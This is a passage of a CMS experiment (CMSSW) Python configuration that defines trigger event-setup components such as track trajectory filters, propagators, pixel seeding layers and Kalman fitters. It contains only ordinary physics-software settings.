cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"HcalSeverityLevelComputerRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nhltESSEcalSeverityLevel = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"EcalSeverityLevelAlgoRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nhltESSBTagRecord = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"JetTagComputerRecord\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nhltESSAK5CaloL2L3 = cms.ESSource( \"JetCorrectionServiceChain\",\n appendToDataLabel = cms.string( \"\" ),\n correctors = cms.vstring( 'hltESSL2RelativeCorrectionService',\n 'hltESSL3AbsoluteCorrectionService' ),\n label = cms.string( \"hltESSAK5CaloL2L3\" )\n)\nhltESSAK5CaloL1L2L3 = cms.ESSource( \"JetCorrectionServiceChain\",\n appendToDataLabel = cms.string( \"\" ),\n correctors = cms.vstring( 'hltESSL1FastJetCorrectionService',\n 'hltESSL2RelativeCorrectionService',\n 'hltESSL3AbsoluteCorrectionService' ),\n label = cms.string( \"hltESSAK5CaloL1L2L3\" )\n)\n\nsiPixelTemplateDBObjectESProducer = cms.ESProducer( \"SiPixelTemplateDBObjectESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\npreshowerDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"PreshowerDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.1 ),\n nEta = cms.int32( 60 ),\n nPhi = cms.int32( 30 ),\n includeBadChambers = cms.bool( False )\n)\nnavigationSchoolESProducer = cms.ESProducer( \"NavigationSchoolESProducer\",\n ComponentName = cms.string( \"SimpleNavigationSchool\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nmuonDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"MuonDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.125 ),\n nEta = cms.int32( 48 ),\n nPhi = cms.int32( 48 ),\n includeBadChambers = cms.bool( False )\n)\nhoDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"HODetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = 
cms.double( 0.087 ),\n nEta = cms.int32( 30 ),\n nPhi = cms.int32( 72 ),\n includeBadChambers = cms.bool( False )\n)\nhltESPbJetRegionalTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPbJetRegionalTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 8 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 1.0 )\n )\n)\nhltESPbJetRegionalTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPbJetRegionalTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPbJetRegionalTrajectoryFilter\" ),\n maxCand = cms.int32( 1 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectorySmootherRK = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPTrajectorySmootherRK\" ),\n Propagator = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryFitterRK = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryFitterRK\" ),\n Propagator = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryFilterL3 = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryFilterL3\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 1000000000 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.5 )\n )\n)\nhltESPTrajectoryCleanerBySharedHits = cms.ESProducer( \"TrajectoryCleanerESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n ComponentType = cms.string( \"TrajectoryCleanerBySharedHits\" ),\n appendToDataLabel = cms.string( \"\" ),\n fractionShared = cms.double( 0.5 ),\n allowSharedFirstHit = cms.bool( False )\n)\nhltESPTrajectoryBuilderL3 = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryBuilderL3\" ),\n updator = 
cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPTrajectoryFilterL3\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrackCounting3D2nd = cms.ESProducer( \"TrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n nthTrack = cms.int32( 2 ),\n impactParameterType = cms.int32( 0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 5.0 ),\n maximumDistanceToJetAxis = cms.double( 0.07 ),\n trackQualityClass = cms.string( \"any\" )\n)\nhltESPTrackCounting3D1st = cms.ESProducer( \"TrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n nthTrack = cms.int32( 1 ),\n impactParameterType = cms.int32( 0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 5.0 ),\n maximumDistanceToJetAxis = cms.double( 0.07 ),\n trackQualityClass = cms.string( \"any\" )\n)\nhltESPTTRHBuilderPixelOnly = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTTRHBWithTrackAngle = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPStraightLinePropagator = cms.ESProducer( \"StraightLinePropagatorESProducer\",\n ComponentName = cms.string( \"hltESPStraightLinePropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSteppingHelixPropagatorAlong = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSteppingHelixPropagatorAlong\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n 
useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSoftLeptonByPt = cms.ESProducer( \"LeptonTaggerByPtESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ipSign = cms.string( \"any\" )\n)\nhltESPSoftLeptonByDistance = cms.ESProducer( \"LeptonTaggerByDistanceESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n distance = cms.double( 0.5 )\n)\nhltESPSmartPropagatorOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSmartPropagatorAnyOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagatorAnyOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSmartPropagatorAny = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagatorAny\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSmartPropagator = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"hltESPSteppingHelixPropagatorAlong\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSiStripRegionConnectivity = cms.ESProducer( \"SiStripRegionConnectivity\",\n EtaDivisions = cms.untracked.uint32( 20 ),\n PhiDivisions = cms.untracked.uint32( 20 ),\n EtaMax = cms.untracked.double( 2.5 )\n)\nhltESPRungeKuttaTrackerPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( True ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPPromptTrackCountingESProducer = cms.ESProducer( \"PromptTrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n impactParameterType = cms.int32( 0 ),\n maximumDistanceToJetAxis = cms.double( 999999.0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = 
cms.double( 999999.0 ),\n maxImpactParameterSig = cms.double( 999999.0 ),\n trackQualityClass = cms.string( \"any\" ),\n nthTrack = cms.int32( -1 ),\n maxImpactParameter = cms.double( 0.03 ),\n deltaRmin = cms.double( 0.0 )\n)\nhltESPPixelLayerTripletsHITHE = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerTripletsHITHE\" ),\n layerList = cms.vstring( 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelLayerTripletsHITHB = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerTripletsHITHB\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelLayerTriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" 
),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelCPEGeneric = cms.ESProducer( \"PixelCPEGenericESProducer\",\n ComponentName = cms.string( \"hltESPPixelCPEGeneric\" ),\n eff_charge_cut_lowX = cms.double( 0.0 ),\n eff_charge_cut_lowY = cms.double( 0.0 ),\n eff_charge_cut_highX = cms.double( 1.0 ),\n eff_charge_cut_highY = cms.double( 1.0 ),\n size_cutX = cms.double( 3.0 ),\n size_cutY = cms.double( 3.0 ),\n EdgeClusterErrorX = cms.double( 50.0 ),\n EdgeClusterErrorY = cms.double( 85.0 ),\n inflate_errors = cms.bool( False ),\n inflate_all_errors_no_trk_angle = cms.bool( False ),\n UseErrorsFromTemplates = cms.bool( True ),\n TruncatePixelCharge = cms.bool( True ),\n IrradiationBiasCorrection = cms.bool( False ),\n DoCosmics = cms.bool( False ),\n LoadTemplatesFromDB = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n TanLorentzAnglePerTesla = cms.double( 0.106 ),\n PixelErrorParametrization = cms.string( \"NOTcmsim\" ),\n Alpha2Order = cms.bool( True ),\n ClusterProbComputationFlag = cms.int32( 0 )\n)\nhltESPMuonTransientTrackingRecHitBuilder = cms.ESProducer( \"MuonTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPMuonCkfTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPMuonCkfTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n minimumNumberOfHits = cms.int32( 5 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltESPMuonCkfTrajectoryBuilder = cms.ESProducer( \"MuonCkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n propagatorProximity = cms.string( \"SteppingHelixPropagatorAny\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPMuonCkfTrajectoryFilter\" ),\n useSeedLayer = cms.bool( False ),\n rescaleErrorIfFail = cms.double( 1.0 ),\n deltaEta = cms.double( 0.1 ),\n deltaPhi = cms.double( 0.1 ),\n appendToDataLabel = cms.string( \"\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( False ),\n alwaysUseInvalidHits = cms.bool( True )\n)\nhltESPMuTrackJpsiTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPMuTrackJpsiTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n 
ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 8 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 1.0 )\n )\n)\nhltESPMuTrackJpsiTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPMuTrackJpsiTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPMuTrackJpsiTrajectoryFilter\" ),\n maxCand = cms.int32( 1 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPMixedLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPMixedLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg',\n 'FPix2_pos+TEC1_pos',\n 'FPix2_pos+TEC2_pos',\n 'TEC1_pos+TEC2_pos',\n 'TEC2_pos+TEC3_pos',\n 'FPix2_neg+TEC1_neg',\n 'FPix2_neg+TEC2_neg',\n 'TEC1_neg+TEC2_neg',\n 'TEC2_neg+TEC3_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 1 )\n ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPL3MuKFTrajectoryFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFUpdator = cms.ESProducer( \"KFUpdatorESProducer\",\n ComponentName = cms.string( \"hltESPKFUpdator\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectorySmootherForMuonTrackLoader = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n Propagator = cms.string( \"hltESPSmartPropagatorAnyOpposite\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling 
= cms.double( 10.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectorySmootherForL2Muon = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectorySmootherForL2Muon\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorOpposite\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectorySmoother = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectorySmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectoryFitterForL2Muon = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectoryFitterForL2Muon\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectoryFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectoryFitter\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFFittingSmootherForL2Muon = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFFittingSmootherForL2Muon\" ),\n Fitter = cms.string( \"hltESPKFTrajectoryFitterForL2Muon\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForL2Muon\" ),\n EstimateCut = cms.double( -1.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = 